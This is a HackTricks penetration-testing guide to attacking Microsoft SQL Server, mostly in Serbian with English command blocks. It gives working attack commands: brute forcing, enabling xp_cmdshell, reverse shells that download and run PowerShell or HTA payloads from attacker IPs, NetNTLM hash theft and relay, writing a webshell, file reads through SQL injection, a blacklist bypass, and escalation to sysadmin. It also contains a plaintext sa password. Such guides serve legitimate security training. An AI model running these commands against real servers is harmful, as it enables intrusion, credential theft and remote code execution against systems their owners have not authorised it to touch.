# 1433 - Pentesting MSSQL - Microsoft SQL Server {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## Basic Information From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): > **Microsoft SQL Server** je **sistem za upravljanje relacionim bazama podataka** koji je razvio Microsoft. Kao serverski softver, to je softverski proizvod čija je osnovna funkcija skladištenje i preuzimanje podataka na zahtev drugih softverskih aplikacija—koje mogu raditi ili na istom računaru ili na drugom računaru preko mreže (uključujući Internet).\\ **Default port:** 1433 ``` 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM ``` ### **Podrazumevane MS-SQL sistemske tabele** * **master Baza podataka**: Ova baza podataka je ključna jer beleži sve sistemske detalje za SQL Server instancu. * **msdb Baza podataka**: SQL Server Agent koristi ovu bazu podataka za upravljanje rasporedom za alarme i poslove. * **model Baza podataka**: Deluje kao plan za svaku novu bazu podataka na SQL Server instanci, gde se sve izmene poput veličine, kolacije, modela oporavka i još mnogo toga odražavaju u novokreiranim bazama podataka. * **Resource Baza podataka**: Baza podataka samo za čitanje koja sadrži sistemske objekte koji dolaze sa SQL Server-om. Ovi objekti, iako su fizički smešteni u Resource bazi podataka, logički su predstavljeni u sys šemi svake baze podataka. * **tempdb Baza podataka**: Služi kao privremeni prostor za skladištenje prolaznih objekata ili međurezultata. ## Enumeracija ### Automatska enumeracija Ako ne znate ništa o usluzi: ```bash nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 msf> use auxiliary/scanner/mssql/mssql_ping ``` {% hint style="info" %} Ako **nemate** **akreditiv** možete pokušati da ih pogodite. Možete koristiti nmap ili metasploit. Budite oprezni, možete **blokirati naloge** ako nekoliko puta ne uspete da se prijavite koristeći postojeće korisničko ime. {% endhint %} #### Metasploit (potrebni akreditivi) ```bash #Set USERNAME, RHOSTS and PASSWORD #Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used #Steal NTLM msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder #Info gathering msf> use admin/mssql/mssql_enum #Security checks msf> use admin/mssql/mssql_enum_domain_accounts msf> use admin/mssql/mssql_enum_sql_logins msf> use auxiliary/admin/mssql/mssql_findandsampledata msf> use auxiliary/scanner/mssql/mssql_hashdump msf> use auxiliary/scanner/mssql/mssql_schemadump #Search for insteresting data msf> use auxiliary/admin/mssql/mssql_findandsampledata msf> use auxiliary/admin/mssql/mssql_idf #Privesc msf> use exploit/windows/mssql/mssql_linkcrawler msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin #Code execution msf> use admin/mssql/mssql_exec #Execute commands msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload #Add new admin user from meterpreter session msf> use windows/manage/mssql_local_auth_bypass ``` ### [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#sql-server) ### Ručna enumeracija #### Prijava [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) ```shell # Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using tickets against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt # Bruteforce using passwords against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt # Bruteforce using hashes against the hosts listed on the hosts.txt mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt ``` ```bash # Using Impacket mssqlclient.py mssqlclient.py [-db volume] /:@ ## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine mssqlclient.py [-db volume] -windows-auth /:@ # Using sqsh sqsh -S -U -P -D ## In case Windows Auth using "." as domain name for local user sqsh -S -U .\\ -P -D ## In sqsh you need to use GO after writting the query to send it 1> select 1; 2> go ``` #### Uobičajena Enumeracija ```sql # Get version select @@version; # Get user select user_name(); # Get databases SELECT name FROM master.dbo.sysdatabases; # Use database USE master #Get table names SELECT * FROM .INFORMATION_SCHEMA.TABLES; #List Linked Servers EXEC sp_linkedservers SELECT * FROM sys.servers; #List users select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name; #Create user with sysadmin privs CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!' EXEC sp_addsrvrolemember 'hacker', 'sysadmin' #Enumerate links enum_links #Use a link use_link [NAME] ``` #### Dobij korisnika {% content-ref url="types-of-mssql-users.md" %} [types-of-mssql-users.md](types-of-mssql-users.md) {% endcontent-ref %} ```sql # Get all the users and roles select * from sys.database_principals; ## This query filters a bit the results select name, create_date, modify_date, type_desc as type, authentication_type_desc as authentication_type, sid from sys.database_principals where type not in ('A', 'R') order by name; ## Both of these select all the users of the current database (not the server). ## Interesting when you cannot acces the table sys.database_principals EXEC sp_helpuser SELECT * FROM sysusers ``` #### Dobijanje dozvola 1. **Securable:** Definisano kao resursi kojima upravlja SQL Server za kontrolu pristupa. Ovi su kategorizovani u: * **Server** – Primeri uključuju baze podataka, prijave, krajnje tačke, grupe dostupnosti i server uloge. * **Database** – Primeri obuhvataju uloge baze podataka, aplikacione uloge, šeme, sertifikate, kataloge punog teksta i korisnike. * **Schema** – Uključuje tabele, prikaze, procedure, funkcije, sinonime itd. 2. **Permission:** Povezane sa SQL Server securables, dozvole kao što su ALTER, CONTROL i CREATE mogu se dodeliti principalu. Upravljanje dozvolama se vrši na dva nivoa: * **Server Level** koristeći prijave * **Database Level** koristeći korisnike 3. **Principal:** Ovaj termin se odnosi na entitet kojem je dodeljena dozvola za securable. Principali uglavnom uključuju prijave i korisnike baze podataka. Kontrola pristupa securables se vrši kroz dodeljivanje ili odbijanje dozvola ili uključivanjem prijava i korisnika u uloge opremljene pravima pristupa. ```sql # Show all different securables names SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT); # Show all possible permissions in MSSQL SELECT * FROM sys.fn_builtin_permissions(DEFAULT); # Get all my permissions over securable type SERVER SELECT * FROM fn_my_permissions(NULL, 'SERVER'); # Get all my permissions over a database USE SELECT * FROM fn_my_permissions(NULL, 'DATABASE'); # Get members of the role "sysadmin" Use master EXEC sp_helpsrvrolemember 'sysadmin'; # Get if the current user is sysadmin SELECT IS_SRVROLEMEMBER('sysadmin'); # Get users that can run xp_cmdshell Use master EXEC sp_helprotect 'xp_cmdshell' ``` ## Tricks ### Execute OS Commands {% hint style="danger" %} Napomena da je za izvršavanje komandi neophodno ne samo da je **`xp_cmdshell`** **omogućena**, već i da imate **EXECUTE dozvolu na `xp_cmdshell` skladištenoj proceduri**. Možete saznati ko (osim sysadmin-a) može koristiti **`xp_cmdshell`** sa: ```sql Use master EXEC sp_helprotect 'xp_cmdshell' ``` {% endhint %} ```bash # Username + Password + CMD command crackmapexec mssql -d -u -p -x "whoami" # Username + Hash + PS command crackmapexec mssql -d -u -H -X '$PSVersionTable' # Check if xp_cmdshell is enabled SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'; # This turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE #This enables xp_cmdshell sp_configure 'xp_cmdshell', '1' RECONFIGURE #One liner EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; # Quickly check what the service account is via xp_cmdshell EXEC master..xp_cmdshell 'whoami' # Get Rev shell EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile' # Bypass blackisted "EXEC xp_cmdshell" '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) ```shell # Executing custom assembly on the current server with windows authentication and executing hostname command mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname # Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname # Executing the hostname command using stored procedures on the linked SRV01 server mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname # Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate ``` ### Ukradi NetNTLM hash / Relay napad Trebalo bi da pokrenete **SMB server** da uhvatite hash koji se koristi u autentifikaciji (`impacket-smbserver` ili `responder` na primer). ```bash xp_dirtree '\\\any\thing' exec master.dbo.xp_dirtree '\\\any\thing' EXEC master..xp_subdirs '\\\anything\' EXEC master..xp_fileexist '\\\anything\' # Capture hash sudo responder -I tun0 sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` [MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) ```shell # Issuing NTLM relay attack on the SRV01 server mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 # Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 # Issuing NTLM relay attack on the local server with custom command mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 ``` {% hint style="warning" %} Možete proveriti ko (osim sysadmins) ima dozvole da pokreće te MSSQL funkcije sa: ```sql Use master; EXEC sp_helprotect 'xp_dirtree'; EXEC sp_helprotect 'xp_subdirs'; EXEC sp_helprotect 'xp_fileexist'; ``` {% endhint %} Korišćenjem alata kao što su **responder** ili **Inveigh** moguće je **ukrasti NetNTLM hash**.\ Možete videti kako koristiti ove alate u: {% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} [spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) {% endcontent-ref %} ### Zloupotreba MSSQL poverljivih veza [**Pročitajte ovaj post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **da biste pronašli više informacija o tome kako zloupotrebiti ovu funkciju:** {% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %} [abusing-ad-mssql.md](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) {% endcontent-ref %} ### **Pisanje fajlova** Da bismo pisali fajlove koristeći `MSSQL`, **moramo omogućiti** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), što zahteva administratorske privilegije, a zatim izvršiti neke sačuvane procedure za kreiranje fajla: ```bash # Enable Ole Automation Procedures sp_configure 'show advanced options', 1 RECONFIGURE sp_configure 'Ole Automation Procedures', 1 RECONFIGURE # Create a File DECLARE @OLE INT DECLARE @FileID INT EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1 EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '' EXECUTE sp_OADestroy @FileID EXECUTE sp_OADestroy @OLE ``` ### **Čitanje datoteke sa** OPENROWSET Po defaultu, `MSSQL` omogućava čitanje datoteka **na bilo kojoj datoteci u operativnom sistemu na kojoj nalog ima pristup za čitanje**. Možemo koristiti sledeći SQL upit: ```sql SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents ``` Međutim, **`BULK`** opcija zahteva **`ADMINISTER BULK OPERATIONS`** ili **`ADMINISTER DATABASE BULK OPERATIONS`** dozvolu. ```sql # Check if you have it SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS'; ``` #### Vektor zasnovan na grešci za SQLi: ``` https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- ``` ### **RCE/Čitanje datoteka izvršavanjem skripti (Python i R)** MSSQL može omogućiti izvršavanje **skripti u Python-u i/ili R**. Ovi kodovi će biti izvršeni od strane **drugog korisnika** nego onog koji koristi **xp\_cmdshell** za izvršavanje komandi. Primer pokušaja izvršavanja **'R'** _"Hellow World!"_ **ne radi**: ![](<../../.gitbook/assets/image (393).png>) Primer korišćenja konfigurisanog python-a za izvođenje nekoliko akcija: ```sql # Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' #Open and read a file EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' #Multiline EXECUTE sp_execute_external_script @language = N'Python', @script = N' import sys print(sys.version) ' GO ``` ### Čitanje registra Microsoft SQL Server pruža **više proširenih skladišnih procedura** koje vam omogućavaju da komunicirate ne samo sa mrežom već i sa datotečnim sistemom, pa čak i sa [**Windows registrom**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)**:** | **Redovni** | **Svestan o instanci** | | ---------------------------- | -------------------------------------- | | sys.xp\_regread | sys.xp\_instance\_regread | | sys.xp\_regenumvalues | sys.xp\_instance\_regenumvalues | | sys.xp\_regenumkeys | sys.xp\_instance\_regenumkeys | | sys.xp\_regwrite | sys.xp\_instance\_regwrite | | sys.xp\_regdeletevalue | sys.xp\_instance\_regdeletevalue | | sys.xp\_regdeletekey | sys.xp\_instance\_regdeletekey | | sys.xp\_regaddmultistring | sys.xp\_instance\_regaddmultistring | | sys.xp\_regremovemultistring | sys.xp\_instance\_regremovemultistring | ```sql # Example read registry EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory'; # Example write and then read registry EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!'; EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue'; # Example to check who can use these functions Use master; EXEC sp_helprotect 'xp_regread'; EXEC sp_helprotect 'xp_regwrite'; ``` For **more examples** check out the [**original source**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/). ### RCE with MSSQL User Defined Function - SQLHttp Moguće je **učitati .NET dll unutar MSSQL sa prilagođenim funkcijama**. Ovo, međutim, **zahteva `dbo` pristup** tako da vam je potrebna veza sa bazom podataka **kao `sa` ili u ulozi Administratora**. [**Following this link**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) to see an example. ### Other ways for RCE Postoje druge metode za dobijanje izvršenja komandi, kao što su dodavanje [proširenih skladištenih procedura](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), i [spoljašnjih skripti](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). ## MSSQL Privilege Escalation ### From db\_owner to sysadmin Ako **običan korisnik** dobije ulogu **`db_owner`** nad **bazom podataka koju poseduje admin** korisnik (kao što je **`sa`**) i ta baza podataka je konfigurisana kao **`trustworthy`**, taj korisnik može zloupotrebiti te privilegije za **privesc** jer **skladištene procedure** kreirane tamo mogu **izvršavati** kao vlasnik (**admin**). ```sql # Get owners of databases SELECT suser_sname(owner_sid) FROM sys.databases # Find trustworthy databases SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name; # Get roles over the selected database (look for your username as db_owner) USE SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id) # If you found you are db_owner of a trustworthy database, you can privesc: --1. Create a stored procedure to add your user to sysadmin role USE CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'USERNAME','sysadmin' --2. Execute stored procedure to get sysadmin role USE EXEC sp_elevate_me --3. Verify your user is a sysadmin SELECT is_srvrolemember('sysadmin') ``` Možete koristiti **metasploit** modul: ```bash msf> use auxiliary/admin/mssql/mssql_escalate_dbowner ``` Ili **PS** skripta: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1 Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1 Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184 ``` ### Impersonacija drugih korisnika SQL Server ima posebnu dozvolu, nazvanu **`IMPERSONATE`**, koja **omogućava izvršnom korisniku da preuzme dozvole drugog korisnika** ili prijave dok se kontekst ne resetuje ili sesija ne završi. ```sql # Find users you can impersonate SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' # Check if the user "sa" or any other high privileged user is mentioned # Impersonate sa user EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') # If you can't find any users, make sure to check for links enum_links # If there is a link of interest, re-run the above steps on each link use_link [NAME] ``` {% hint style="info" %} Ako možete da se pretvarate da ste korisnik, čak i ako nije sysadmin, trebalo bi da proverite **da li korisnik ima pristup** drugim **baza podataka** ili povezanih servera. {% endhint %} Imajte na umu da kada postanete sysadmin, možete se pretvarati da ste bilo koji drugi: ```sql -- Impersonate RegUser EXECUTE AS LOGIN = 'RegUser' -- Verify you are now running as the the MyUser4 login SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT ``` Možete izvesti ovaj napad pomoću **metasploit** modula: ```bash msf> auxiliary/admin/mssql/mssql_escalate_execute_as ``` или са **PS** скриптом: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1 Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1 Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword! ``` ## Korišćenje MSSQL za postojanost [https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/) ## Ekstrakcija lozinki iz SQL Server Linked Servers Napadač može da ekstrakuje lozinke SQL Server Linked Servers iz SQL instanci i dobije ih u čistom tekstu, omogućavajući napadaču lozinke koje se mogu koristiti za sticanje veće kontrole nad metom. Skripta za ekstrakciju i dekripciju lozinki koje su sačuvane za Linked Servers može se pronaći [ovde](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) Neki zahtevi i konfiguracije moraju biti izvršeni kako bi ovaj exploit radio. Prvo, morate imati administratorska prava na mašini, ili mogućnost upravljanja SQL Server konfiguracijama. Nakon što potvrdite svoja prava, potrebno je da konfigurišete tri stvari, a to su: 1. Omogućite TCP/IP na SQL Server instancama; 2. Dodajte Start Up parametar, u ovom slučaju, biće dodat trace flag, koji je -T7806. 3. Omogućite udaljenu administratorsku vezu. Da automatizujete ove konfiguracije, [ovo repozitorijum](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) ima potrebne skripte. Pored toga što ima powershell skriptu za svaki korak konfiguracije, repozitorijum takođe ima kompletnu skriptu koja kombinuje skripte za konfiguraciju i ekstrakciju i dekripciju lozinki. Za dodatne informacije, pogledajte sledeće linkove u vezi sa ovim napadom: [Dekripcija lozinki MSSQL baze podataka Link Server](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) [Troubleshooting SQL Server Dedicated Administrator Connection](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) ## Lokalna eskalacija privilegija Korisnik koji pokreće MSSQL server će imati omogućenu privilegiju **SeImpersonatePrivilege.**\ Verovatno ćete moći da **eskalirate na Administratora** prateći jednu od ove 2 stranice: {% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %} [roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md) {% endcontent-ref %} {% content-ref url="../../windows-hardening/windows-local-privilege-escalation/juicypotato.md" %} [juicypotato.md](../../windows-hardening/windows-local-privilege-escalation/juicypotato.md) {% endcontent-ref %} ## Shodan * `port:1433 !HTTP` ## Reference * [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) * [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) * [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/) * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/) * [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/) * [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) * [https://mayfly277.github.io/posts/GOADv2-pwning-part12/](https://mayfly277.github.io/posts/GOADv2-pwning-part12/) ## HackTricks Automatske Komande ``` Protocol_Name: MSSQL #Protocol Abbreviation if there is one. Port_Number: 1433 #Comma separated if there is more than one. Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for MSSQL Note: | Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet). #sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G ###the goal is to get xp_cmdshell working### 1. try and see if it works xp_cmdshell `whoami` go 2. try to turn component back on EXEC SP_CONFIGURE 'xp_cmdshell' , 1 reconfigure go xp_cmdshell `whoami` go 3. 'advanced' turn it back on EXEC SP_CONFIGURE 'show advanced options', 1 reconfigure go EXEC SP_CONFIGURE 'xp_cmdshell' , 1 reconfigure go xp_cmdshell 'whoami' go xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server Entry_2: Name: Nmap for SQL Description: Nmap with SQL Scripts Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP} Entry_3: Name: MSSQL consolesless mfs enumeration Description: MSSQL enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT ; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT ; run; exit' ``` {% hint style="success" %} Učite i vežbajte AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Učite i vežbajte GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Podržite HackTricks * Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
{% endhint %}